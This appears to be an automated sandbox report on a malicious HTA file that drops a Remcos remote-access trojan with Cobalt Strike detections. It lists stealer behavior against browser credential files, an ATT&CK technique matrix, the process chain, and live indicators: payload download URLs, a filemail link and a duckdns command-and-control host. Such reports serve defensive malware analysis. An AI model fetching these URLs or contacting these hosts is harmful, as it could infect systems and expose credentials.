                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00404915 GetLocalTime,CreateEventA,CreateThread,13_2_00404915
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041A7A2 GetComputerNameExW,GetUserNameW,13_2_0041A7A2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00448057 _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,13_2_00448057
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data13_2_0040B21B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\13_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db13_2_0040B335

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-EC111KJump to behavior
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.4110277483.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe13_2_00405042
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information111
                    Scripting
                    Valid Accounts1
                    Native API
                    111
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    2
                    Obfuscated Files or Information
                    111
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Email Collection
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts13
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    Software Packing
                    2
                    Credentials In Files
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares111
                    Input Capture
                    1
                    Remote Access Software
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    DLL Side-Loading
                    NTDS3
                    File and Directory Discovery
                    Distributed Component Object Model3
                    Clipboard Data
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts4
                    PowerShell
                    Network Logon Script221
                    Process Injection
                    1
                    Bypass User Account Control
                    LSA Secrets34
                    System Information Discovery
                    SSHKeylogging213
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials21
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Access Token Manipulation
                    Proc Filesystem2
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt221
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562937 Sample: sweetbabygivenbestthignsetn... Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 50 nextnewupdationsforu.duckdns.org 2->50 52 ip.3105.filemail.com 2->52 54 3105.filemail.com 2->54 70 Suricata IDS alerts for network traffic 2->70 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 78 19 other signatures 2->78 11 mshta.exe 1 2->11         started        signatures3 76 Uses dynamic DNS services 50->76 process4 signatures5 102 Detected Cobalt Strike Beacon 11->102 104 Suspicious powershell command line found 11->104 106 PowerShell case anomaly found 11->106 14 powershell.exe 3 39 11->14         started        process6 dnsIp7 60 104.168.46.26, 49730, 49738, 80 AS-COLOCROSSINGUS United States 14->60 46 bestofthingswithen...thignstodowithg.vBs, Unicode 14->46 dropped 48 C:\Users\user\AppData\...\blaytqul.cmdline, Unicode 14->48 dropped 62 Detected Cobalt Strike Beacon 14->62 64 Suspicious powershell command line found 14->64 66 Obfuscated command line found 14->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 14->68 19 wscript.exe 1 14->19         started        22 powershell.exe 21 14->22         started        24 csc.exe 3 14->24         started        27 conhost.exe 14->27         started        file8 signatures9 process10 file11 80 Detected Cobalt Strike Beacon 19->80 82 Suspicious powershell command line found 19->82 84 Wscript starts Powershell (via cmd or directly) 19->84 88 3 other signatures 19->88 29 powershell.exe 7 19->29         started        86 Loading BitLocker PowerShell Module 22->86 44 C:\Users\user\AppData\Local\...\blaytqul.dll, PE32 24->44 dropped 32 cvtres.exe 1 24->32         started        signatures12 process13 signatures14 108 Detected Cobalt Strike Beacon 29->108 110 Suspicious powershell command line found 29->110 112 Obfuscated command line found 29->112 34 powershell.exe 15 16 29->34         started        38 conhost.exe 29->38         started        process15 dnsIp16 56 ip.3105.filemail.com 193.30.119.205, 443, 49731 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown 34->56 90 Writes to foreign memory regions 34->90 92 Injects a PE file into a foreign processes 34->92 40 CasPol.exe 3 34->40         started        signatures17 process18 dnsIp19 58 nextnewupdationsforu.duckdns.org 192.169.69.26, 14645, 49739, 49740 WOWUS United States 40->58 94 Contains functionality to bypass UAC (CMSTPLUA) 40->94 96 Detected Remcos RAT 40->96 98 Contains functionalty to change the wallpaper 40->98 100 4 other signatures 40->100 signatures20

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta21%ReversingLabsScript-JS.Trojan.Cryxos
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://104.168.46.26/1422/bestof0%Avira URL Cloudsafe
                    http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIF100%Avira URL Cloudmalware
                    http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFP0%Avira URL Cloudsafe
                    http://104.168.46.26/1422/RFGVGF.txt0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c0%Avira URL Cloudsafe
                    https://3105.filemail.com/api/file/0%Avira URL Cloudsafe
                    https://3105.filemail.com0%Avira URL Cloudsafe
                    nextnewupdationsforu.duckdns.org100%Avira URL Cloudmalware
                    https://3105.filemail.co0%Avira URL Cloudsafe
                    https://3105.filemailQ0%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip.3105.filemail.com
                    193.30.119.205
                    truetrue
                      unknown
                      nextnewupdationsforu.duckdns.org
                      192.169.69.26
                      truefalse
                        high
                        3105.filemail.com
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFtrue
                          • Avira URL Cloud: malware
                          unknown
                          http://104.168.46.26/1422/RFGVGF.txttrue
                          • Avira URL Cloud: safe
                          unknown
                          https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7ctrue
                          • Avira URL Cloud: safe
                          unknown
                          nextnewupdationsforu.duckdns.orgtrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdpowershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://104.168.46.26/1422/bestofpowershell.exe, 00000001.00000002.1818550362.0000000004B6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://go.micropowershell.exe, 00000001.00000002.1818550362.0000000004EC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://contoso.com/Licensepowershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://contoso.com/Iconpowershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://go.microspowershell.exe, 00000003.00000002.1707345310.0000000005314000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://3105.filemail.copowershell.exe, 00000007.00000002.2469026614.00000000031B7000.00000004.00000020.00020000.00000000.sdmptrue
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://geoplugin.net/json.gpCasPol.exefalse
                                                high
                                                http://crl.micropowershell.exe, 00000003.00000002.1706219573.0000000002F20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2473025138.0000000003386000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://geoplugin.net/json.gp/Cpowershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
                                                    https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000511A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000512B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1707345310.0000000004F86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1824468427.000000000582C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1709635524.0000000005E9D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://3105.filemail.com/api/file/powershell.exe, 00000009.00000002.2099410808.000000000746F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2100899330.0000000007541000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2046886997.0000000002F60000.00000004.00000020.00020000.00000000.sdmptrue
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1818550362.00000000047C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1707345310.0000000004E31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2476132425.000000000514A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2047488224.0000000004C61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://3105.filemail.compowershell.exe, 00000009.00000002.2047488224.0000000004DB8000.00000004.00000800.00020000.00000000.sdmptrue
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://104.168.46.26/1422/bestofthingswithentiretimegivenebstthignstodowithgreat.tIFPpowershell.exe, 00000001.00000002.1816371508.0000000000A88000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://3105.filemailQpowershell.exe, 00000009.00000002.2099410808.0000000007496000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              193.30.119.205
                                                              ip.3105.filemail.comunknown
                                                              680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue
                                                              104.168.46.26
                                                              unknownUnited States
                                                              36352AS-COLOCROSSINGUStrue
                                                              192.169.69.26
                                                              nextnewupdationsforu.duckdns.orgUnited States
                                                              23033WOWUSfalse
                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1562937
                                                              Start date and time:2024-11-26 09:43:19 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 58s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:15
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
                                                              Detection:MAL
                                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@19/20@4/3
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 63
                                                              • Number of non-executed functions: 189
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .hta
                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target mshta.exe, PID 7420 because there are no executed function
                                                              • Execution Graph export aborted for target powershell.exe, PID 7492 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7624 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 7916 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta
                                                              TimeTypeDescription
                                                              03:44:11API Interceptor136x Sleep call for process: powershell.exe modified
                                                              03:45:23API Interceptor3155666x Sleep call for process: CasPol.exe modified
                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              193.30.119.205thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                    Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                        OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          104.168.46.26Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 104.168.46.26/1422/RFGVGF.txt
                                                                          192.169.69.26SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                          • yuya0415.duckdns.org:1928/Vre
                                                                          confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                                          • servidorarquivos.duckdns.org/e/e
                                                                          oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                          • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                          oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                          • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                          http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                                          • yvtplhuqem.duckdns.org/ja/
                                                                          http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                          • fqqqffcydg.duckdns.org/en/
                                                                          http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                          • yugdzvsqnf.duckdns.org/en/
                                                                          &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                                          • servidorarquivos.duckdns.org/e/e
                                                                          transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                                          • servidorarquivos.duckdns.org/e/e
                                                                          http://www.secure-0fflce-o365.duckdns.org/Get hashmaliciousUnknownBrowse
                                                                          • www.secure-0fflce-o365.duckdns.org/
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          ip.3105.filemail.comthinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.30.119.205
                                                                          New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          Order Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          OC25-11-24.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 193.30.119.205
                                                                          nextnewupdationsforu.duckdns.orgOrder Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                          • 192.169.69.26
